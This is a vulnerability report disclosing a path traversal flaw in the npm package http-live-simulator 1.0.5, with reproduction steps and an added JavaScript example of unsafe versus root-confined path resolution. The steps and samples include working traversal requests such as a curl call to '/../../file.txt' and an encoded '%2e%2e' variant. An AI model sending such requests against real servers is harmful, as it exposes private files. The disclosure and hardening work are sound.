I would like to report a Path Traversal vulnerability in http-live-simulator.
It allows reading arbitrary files from any location on disk.
module name: http-live-simulator
version: 1.0.5
npm page: https://www.npmjs.com/package/http-live-simulator
> Replace stats below with numbers from npm’s module page:
[9] weekly downloads
> Description about how the vulnerability was found and how it can be exploited, how it harms package users (data modification/loss, system access, other).
The http-live-simulator module doesn’t set a root directory and allows any arbitrary paths to be accessed on the file system and returned to requesting clients.
> Detailed steps to reproduce with all required references/steps/commands. If there is any exploit code or reference to the package source code this is the place where it should be put.
npm install http-live-simulator
node_modules/.bin/http-live --port 8181
curl --path-as-is http://localhost:8181/../../file.txt
Path traversal vulnerability leading to read access to arbitrary files on disk.
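
The missing root-directory check described in this report, shown as an added example that is not taken from http-live-simulator's source: the unsafe join next to a resolver that confines every request to the served directory. The function names and the `/srv/site` root are assumptions made for illustration, and the paths assume a POSIX file system.

```javascript
'use strict';
const path = require('path');

// Unsafe pattern: the request path is joined onto the served directory and
// used as-is, so "../" segments walk out of it.
function resolveUnsafe(root, urlPath) {
  return path.join(root, decodeURIComponent(urlPath));
}

// Hardened: returns an absolute path inside root, or null if the request
// is malformed or would escape root. (Hypothetical helper.)
function resolveInsideRoot(root, urlPath) {
  let decoded;
  try {
    // Drop the query string, then decode so %2e%2e is checked as "..".
    decoded = decodeURIComponent(urlPath.split('?')[0]);
  } catch (err) {
    return null; // malformed percent-encoding
  }
  if (decoded.includes('\0')) return null; // NUL byte in a file name

  const absRoot = path.resolve(root);
  // Prefix "./" so a leading "/" cannot reset the path to the filesystem root.
  const candidate = path.resolve(absRoot, '.' + path.sep + decoded);

  // Containment check on the normalized result, not on the raw string.
  const rel = path.relative(absRoot, candidate);
  const escapes =
    rel === '..' || rel.startsWith('..' + path.sep) || path.isAbsolute(rel);
  // Symlinks inside root are not followed here; compare fs.realpath results
  // if the served tree may contain them.
  return escapes ? null : candidate;
}

// Constructed sample requests, including the one from the report.
const ROOT = '/srv/site';
const samples = [
  '/index.html',
  '/css/../index.html',
  '/../../file.txt',
  '/%2e%2e/%2e%2e/file.txt',
];
for (const p of samples) {
  const safe = resolveInsideRoot(ROOT, p);
  console.log(p, '->', resolveUnsafe(ROOT, p), '|', safe === null ? '403' : safe);
}
```

A server using this check answers 403 (or 404) when the resolver returns null instead of opening the file.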